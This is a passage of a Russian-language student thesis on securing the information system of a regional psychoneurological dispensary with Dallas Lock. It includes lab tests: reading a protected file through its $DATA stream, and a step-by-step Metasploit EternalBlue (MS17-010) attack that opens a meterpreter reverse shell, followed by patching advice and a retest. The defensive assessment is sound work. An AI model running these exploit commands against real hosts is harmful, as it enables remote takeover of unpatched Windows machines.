Файл: Разработка комплекса мероприятий по обеспечению.docx

В соответствии с Приказом №17 ФСТЭК РФ, 20.12. Меры по защите технических средств должны исключать несанкционированный доступ к стационарным техническим средствам, обрабатывающим информацию, средствам, обеспечивающим функционирование ИС, и в помещения, в которых они постоянно расположены, защиту технических средств от внешних воздействий, а также защиту информации, представленной в виде информативных электрических сигналов и физических полей. В качестве решения необходимо воспользоваться DLP-системой.

В целях проверки ИС ГБУЗ ЯНАО «Новоуренгойский психоневрологический диспансер» от НСД, необходимо сделать следующее. Для начала на ОС Windows 7 установим систему Dallas Lock 8.0-C и Dallas

Lock Server. Создадим файл «test.txt» от имени администратора с содержанием «Hello, World!», затем запретим доступ к этому файлу всем пользователям и проверим чтение файла по имени и по атрибуту $DATA, под непривилегированным пользователем (рисунок 22).

Рисунок 22 - Создание файла «test.txt» от имени администратора

Первоначально устанавливаем разрешения, затем запускаем проверку (рисунок 23).

Рисунок 23 - Проверка уязвимости

Уязвимость зафиксирована: любой пользователь может просмотреть содержимое файла, игнорируя все установленные правила.

Далее рассмотрим способность DLP-системы противостоять атакам злоумышленника. Для этого

необходимо использовать еще не обновленную версию Windows 7, где уязвимость MS17-010 не устранена. На одно АРМ установим Dallas Lock 8.0-K (рисунок 24).

Рисунок 24 - Запуск Dallas Lock 8.0-K для проверки уязвимости На второе АРМ установим Dallas Lock Server (рисунок 25):

Рисунок 25 - Запуск Dallas Lock Server для проверки уязвимости

Далее настроим между ними локальную сеть. Затем к этой же сети подключим сервер ИС и с помощью MetaSploit framework попробуем провести тестирование уязвимости Windows 7, на которой установлен Dallas Lock Server. Перед этим необходимо узнать Ip-адреса хостов, находящихся в одной сети с Kali Linux. Но при настройке локальной сети мы использовали сетевой коммутатор, поэтому сеть необходимо настроит вручную.

Для этого необходимо:

открываем консоль и запускаем Postgresql: service postgresql start;
запускаем Metasploit framework: msfconsole;
выбираем, какой сканер будем использовать: use auxiliary/scanner/smb/smb_ms17_010;
выбираем Ip-адрес, который будем сканировать: set RHOSTS 192.168.1.2;
командой run запускаем сканер;

Получили, что данный хост уязвим, значит пробуем его поэксплуатировать. Для этого:

выбираем эксплойт, который будем использовать: use exploit/windows/smb/ms17_010_eternalblue;
смотрим Ip-адрес АРМ: ifconfig;
получили адрес 192.168.1.3;
выбираем Ip-адрес хоста, с которого будет производиться эксплойт: set LHOST 192.168.1.3;
выбираем Ip-адрес удаленного хоста, который мы будем эксплуатировать командой: set RHOST 192.168.1.2;
выбираем полезную нагрузку, которая будет использоваться после успешного выполнения эксплойта: set payload windows/x64/meterpreter/reverse_tcp;
запускаем эксплойт: exploit;

Вывод представлен на рисунке 26.

Рисунок 26 - Вывод команды «exploit»

Эксплойт реализовал доступ к системе, так как курсор в командной строке поменялся на meterpreter>. Это означает, что сессия meterpreter открыта и мы получили доступ к управлению Windows 7, то есть наш удаленный эксплойт работает. Соответственно, уязвимость актуальна т.к. данным способом может воспользоваться злоумышленник.

Из рисунка 27 видно, что Dallas Lock никак не отреагировал. Единственное, в соединениях межсетевого экрана появилось исходящее соединение. Но следует обратить внимание на то, что запрос с АРМ идет по 445 порту, а само подключение к удаленному компьютеру уже по 4444 порту.

Рисунок 27 - Исходящее соединение межсетевого экрана

По результатам проведенного исследования следует отметить, что для устранения данных уязвимостей и предотвращения атак злоумышленников необходимо провести следующие операции:

включить автоматическое обновление Microsoft Windows;
провести автоматическое обновление СОВ Dallas lock и установить новые базы сигнатур (рисунок 28);
настроить автоматическое обновление сигнатур СОВ Dallas Lock.

Рисунок 28 - Обновление новых баз сигнатур

После

выполнения данной процедуры настройки и корректной установки Dallas Lock необходимо повторно проверить систему.

1 ... 4 5 6 7 8 9 10 11 ... 15

Тестирование эффективности проекта системы защиты

Проверка эффективности проекта системы защиты

Настроенный проект защиты включает с состав DLP-систему, антивирус и межсетевой экран. Данные средства размещаются в сети

учреждения, обеспечивая комплексную защиту от внутренних и внешних угроз. Схема расположения компонентов защиты ГБУЗ ЯНАО

«Новоуренгойский психоневрологический диспансер» в сети представлена на рисунке 29.

Рисунок 29 – Схема сети после внедрения СЗИ

Эксплойт был вновь запущен и на этот раз уязвимости обнаружено не было – вирус не получил доступ к системе (рисунок 30).

Рисунок 30 – Ошибка при получении доступа с установленной СЗИ

После внедрения данной системы защиты были устранены угрозы, описанные в приложении. Система работает взаимосвязано и не требует обновления в данный момент.

Таким образом, настроив данные параметры можно обезопасить ИС ГБУЗ ЯНАО «Новоуренгойский психоневрологический диспансер» от возможного риска НСД, как со стороны посторонних лиц, так и со стороны недобросовестных сотрудников. Описанная СЗИ располагает широким функционалом, способным противостоять самым разнообразным угрозам и легко адаптируется под любую ИТ-инфраструктуру организации.